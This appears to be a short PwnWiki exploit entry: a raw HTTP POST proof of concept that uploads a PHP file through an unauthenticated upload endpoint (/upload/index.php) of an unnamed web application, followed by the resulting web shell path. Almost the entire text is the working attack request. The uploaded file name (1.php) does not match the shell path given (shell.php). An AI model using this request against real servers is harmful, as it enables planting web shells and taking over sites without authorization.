pwnwiki.com
,
POC
POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript,*/*; q=0.01 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer:http://www.xxx.com/admin.php?ac=document&fileurl=knowledge&type=1&menuid=24 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data;boundary=---------------------------115858488212690034922831875554 Content-Length: 256 Origin: http://www.xxx.com Connection: close -----------------------------115858488212690034922831875554 Content-Disposition: form-data;name="files"; filename="1.php" Content-Type: text/plain <?php echo 123; phpinfo(); ?> -----------------------------115858488212690034922831875554—
Shell地址
http://<target>/data//uploadfile//1//shell.php
免费、自由、人人可编辑的漏洞库--PwnWiki.com
